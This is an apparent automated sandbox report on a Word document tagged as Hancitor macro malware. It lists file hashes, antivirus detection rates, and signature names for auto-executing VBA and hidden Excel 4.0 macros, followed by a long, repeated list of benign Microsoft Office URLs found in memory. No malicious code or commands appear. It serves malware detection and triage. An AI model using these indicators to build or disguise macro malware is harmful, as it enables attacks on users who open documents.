Analysis Report 1118_8732615.doc

Overview

General Information

Sample Name: 1118_8732615.doc
Analysis ID: 319766
MD5: 0f75ad40daec01aee7642795cc544bb3
SHA1: 76334ccc6e92d579495671de47664180517cdf05
SHA256: afba9deb16b5100c5964ca33cd42c2aa6b972ad104efd3d58e0ad8b7070cd5f4
Tags: docHancitormacros

Most interesting Screenshot:

Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Yara detected hidden Macro 4.0 in Excel
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: 1118_8732615.doc Virustotal: Detection: 15% Perma Link
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Source: 1118_8732615.doc Virustotal: Detection: 15% Perma Link
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Machine Learning detection for sample
Source: 1118_8732615.doc Joe Sandbox ML: detected
Source: 1118_8732615.doc Joe Sandbox ML: detected
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.office.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.onedrive.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://augloop.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://autodiscover-s.outlook.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cdn.entity.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cortana.ai
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cr.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://directory.services.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://graph.windows.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://graph.windows.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.windows.local
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://management.azure.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://management.azure.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://messaging.office.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://officeapps.live.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://onedrive.live.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office365.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://settings.outlook.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://tasks.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.office.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.onedrive.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://augloop.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://autodiscover-s.outlook.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cdn.entity.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cortana.ai
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://cr.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://directory.services.
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://graph.windows.net
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://graph.windows.net/
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
